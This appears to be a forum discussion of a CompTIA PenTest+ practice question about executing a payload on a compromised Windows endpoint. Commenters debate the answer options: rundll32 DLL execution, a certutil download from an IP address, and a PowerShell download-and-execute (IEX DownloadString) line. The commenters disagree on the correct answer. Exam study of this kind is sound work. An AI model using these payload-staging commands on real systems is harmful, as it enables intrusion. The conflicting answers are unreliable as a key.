Exam PT0-003 topic 1 question 76 discussion

✔ Executes the payload immediately (or as advertised) ✔ Widely used in realistic pentests ✔ Avoids writing to disk (less detectable)

rundll32.exe is used to load and execute an exported function from a DLL, which is a common way for a tester to run a DLL payload on an endpoint. The other options are malformed or incorrect: A: impo is not a valid PowerShell command. B: certutil can be abused to download files but the shown syntax is incorrect (and it's more for file retrieval than directly executing a payload). C: The -encode usage is incorrect; -EncodedCommand expects base64 and the IEX.DownloadString(...) form is malformed.

A. powershell.exe impo C:\tools\foo.ps1 ❌ • Import-Module alone does not execute a payload. B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe ❌ • Downloads the file, but does not execute it automatically. C. powershell.exe -noni -encode IEX.DownloadString(...) ❌ for PT0-003 context • While this works in practice, the exam sometimes expects native Windows binaries for executing a staged payload, not PowerShell scripting. • CompTIA exam wording often hints at DLL execution, which is a core “payload execution technique” they emphasize. D. rundll32.exe c:\path\foo.dll,functName ✅ • Uses a native Windows utility to execute a function exported in a DLL. • Common in post-exploitation and exactly matches what CompTIA expects when asking about executing a payload from an endpoint. • Can trigger a malicious DLL payload, which achieves the goal of additional access.

rundll32.exe is a legitimate Windows utility that can be used to execute functions exported from DLL files. Penetration testers (and attackers) often use it to execute malicious payloads in a way that blends in with normal system activity. The command specifies the path to the DLL file (c:\path\foo.dll) and the function to execute (functName).

rundll32.exe is a legitimate Windows utility used for executing functions within DLL files. Attackers often misuse it to execute malicious code. This option assumes the attacker has already placed the malicious DLL (foo.dll) on the compromised system (at c:\path). By specifying the DLL and the functName (the name of the function within the DLL that contains the malicious code), the attacker can trigger the payload. This technique is commonly used for executing payloads and is relevant to the Pentest+ exam objectives.

Why it's more likely correct: It pulls a script from a remote server and executes it immediately. It doesn't rely on a pre-existing file like a DLL or EXE. This technique is widely used in real-world red team operations, e.g., Cobalt Strike, Empire, etc. It aligns with post-exploitation behavior for staging additional payloads.